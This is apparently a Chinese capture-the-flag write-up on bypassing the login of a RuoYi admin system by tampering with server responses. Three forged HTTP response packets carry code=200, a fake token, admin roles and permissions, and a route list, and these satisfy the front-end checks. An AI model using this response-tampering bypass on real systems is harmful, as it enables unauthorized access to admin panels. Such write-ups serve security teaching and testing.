1 题目要求

利用技术绕过限制，登陆后台获得flag的值

2 解题思路

这是一个若依管理系统登录界面，绕过登录界面，即可看到flag。
前后端分离系统，修改服务端返回数据包，满足前端验证条件即可进行路由跳转。

程序首先将用户名密码等信息POST到服务端,服务端进行验证，前端接收服务端返回数据并验证。
第一层验证经分析发现其要求code=200以及token
因此构造数据包如下：

HTTP/1.1 200 OK
X-Powered-By: Express
vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
access-control-allow-origin: http://121.36.145.157
access-control-allow-credentials: true
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=UTF-8
date: Thu, 13 May 2021 11:22:05 GMT
connection: close
Content-Length: 49
 
{"msg":"用户/密码正确","code":200,"token":"123465"}

第一层验证通过。
第二层验证经分析发现其要求roles,permissions,msg,code=200,user等信息。
因此构造数据包如下：

HTTP/1.1 200 OK
X-Powered-By: Express
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=utf-8
content-length: 84
date: Thu, 13 May 2021 11:14:06 GMT
connection: close
 
{"roles":"[admin]","permissions":"all","msg":"成功获取用户信息","code":200,"user":{"avatar":"123456","useName":"admin"}}

第二层验证通过。
第三层验证经分析发现其要求code=200,data等信息。
因此构造数据包如下：

HTTP/1.1 200 OK
X-Powered-By: Express
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: 0
content-type: application/json;charset=utf-8
content-length: 84
date: Thu, 13 May 2021 11:39:19 GMT
connection: close
 
{"msg":"成功获取动态路由","code":200,"data":[{"path": "/","name": "index","component": "index"}]}